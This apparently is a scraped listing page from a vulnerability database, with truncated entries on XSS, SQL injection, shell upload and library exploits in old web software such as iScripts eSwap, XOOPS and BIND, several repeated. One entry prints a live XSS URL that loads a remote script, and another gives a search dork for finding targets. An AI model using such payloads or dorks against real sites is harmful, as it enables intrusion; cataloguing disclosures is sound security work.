SchoolMation Version 2.3 SQLi and XSS Vulnerability

Exploit for php platform in category web applications =================================================== SchoolMation Version 2.3 SQLi and XSS Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'...

iScripts eSwap v2.0 XSS / SQL Injection Vulnerability

Exploit for php platform in category web applications ===================================================== iScripts eSwap v2.0 XSS / SQL Injection Vulnerability ===================================================== Title:iScripts eSwap v2.0 sqli and xss vulnerability Author: Sid3^effects...

iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting

Title:iScripts eSwap v2.0 sqli and xss vulnerability Author: Sid3^effects Published: 2010-06-05 price:$99.95 email:[email protected] vendor: iScripts url : http://www.iscripts.com/eswap/ google dork : Powered by iScripts eSwap. ooooo .oooooo. oooooo oooooo oooo 888' d8P' Y8b 888. 888. .8' 888 88...

Cross-site Scripting (XSS) Vulnerability in Nuggetz CMS

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Nuggetz CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerability in Nuggetz CMS The vulnerability exists due to input sanitation error in the "pagevalue" parameter in...

Burning Board Lite 1.0.2 Shell Upload

======================================================================================== | Title : Burning Board Lite 1.0.2 Upload Shell Vulnerability | Author : indoushka | email : [email protected] | Home : www.iqs3cur1ty.com | Script : Powered by Burning Board Lite 1.0.2 | Tested on: windo...

XT-Commerce v1 Beta 1 permission to bypass the Modify download backup vulnerability-vulnerability warning-the black bar safety net

Premiere: the Red section of the network security Author: Amxking Submitted to: indoushka Vulnerability program: XT-Commerce v1 Beta 1 Affected version: v1 Beta 1 Risk level: medium Vulnerability description: Amxking:the vulnerability is I and the foreign Avengers team communication time obtained...

XSS vulnerability in some JSPs under admin section

Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...

Announcement Preview banner is a vector for an XSS attack

The announcement preview banner is currently displayed via the global decorator. It can be used for an XSS attack on virtually every page, via the announcementpreviewbannerst URL parameter. We should display the preview only locally in the admin section...

Announcement Preview banner is a vector for an XSS attack

The announcement preview banner is currently displayed via the global decorator. It can be used for an XSS attack on virtually every page, via the announcementpreviewbannerst URL parameter. We should display the preview only locally in the admin section...

Announcement Preview banner is a vector for an XSS attack

The announcement preview banner is currently displayed via the global decorator. It can be used for an XSS attack on virtually every page, via the announcementpreviewbannerst URL parameter. We should display the preview only locally in the admin section...

Local Glibc Shared Library (.so) 2.11.1 - Code Execution

Local Glibc Shared Library .so 2.11.1 - Code Execution Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: Tools-Plugins" in the menue or at latest when they are activated. dlopen is used for initializing and is part of glibc. Se...

Local Glibc shared library (.so) <= 2.11.1 exploit

Exploit for multiple platform in category local exploits ================================================== Local Glibc shared library .so Tools-Plugins" in the menue or at latest when they are activated. dlopen is used for initializing and is part of glibc. See http://linux.die.net/man/3/dlopen...

Easy-Clanpage 2.2 SQL Injection

----------------------------Information------------------------------------------------ +Name : Easy-Clanpage 2.2 http://www.easy-clanpage.de /?section=downloads&action=viewdl&id=18 +Demo : http://studio.siouxsie-fashion.at +Price : for free +Language : PHP +Discovered by Easy Laster +Security...

Multiple Stored XSS in XOOPS 2.4.4 Admin Section

Greetz to all Darkc0de ,AI,ICW, AH Memebers Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit, Author: Beenu Arora Home : www.BeenuArora.com Email : [email protected] Share the c0de! Exploit: Multiple Stored XSS in XOOPS 2.4.4 Admin Section AppSite:...

FreePBX 2.5.x - Information Disclosure

Advisory Name: Information disclosure in FreePBX 2.5.x Internal Cybsec Advisory Id: 2010-0101 Vulnerability Class: Information disclosure Release Date: 15/01/2010 Affected Applications: Confirmed in FreePBX 2.5.x Other versions may also be affected Affected Platforms: Any running FreePBX2.5.x Loc...

CVE-2009-4429

Cross-site scripting XSS vulnerability in the Sections module 5.x before 5.x-1.3 and 6.x before 6.x-1.3 for Drupal allows remote authenticated users with "administer sections" privileges to inject arbitrary web script or HTML via a section name aka the Name field...

Orkut Cross Site Scripting

Patched as of 12/12/2009. All the test procedure along with snapshot is attached in the mail. The vulnerability exists in Video section of orkut. I took following steps to exploit the vulnerability: 1 Login in Orkut account. 2 In your video section, click on "edit description". 3 Now enter the...

Illogator Shop Cross Site Scripting

------------------------ - ILLOGATOR SHOP / XSS - ------------------------ index.php?section=bycategory&subcatid=4&subname=xss EXAMPLE : http://illogator.com/index.php?section=bycategory&subcatid=4&subname=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E...

bind: cache poisoning using not validated DNSSEC responses

Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, and 9.7 beta before 9.7.0b3, with DNSSEC validation enabled and checking disabled CD, allows remote attackers to conduct DNS cache poisoning attacks by receiving a recursive...

DEBIAN-CVE-2009-4022

Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, and 9.7 beta before 9.7.0b3, with DNSSEC validation enabled and checking disabled CD, allows remote attackers to conduct DNS cache poisoning attacks by receiving a recursive...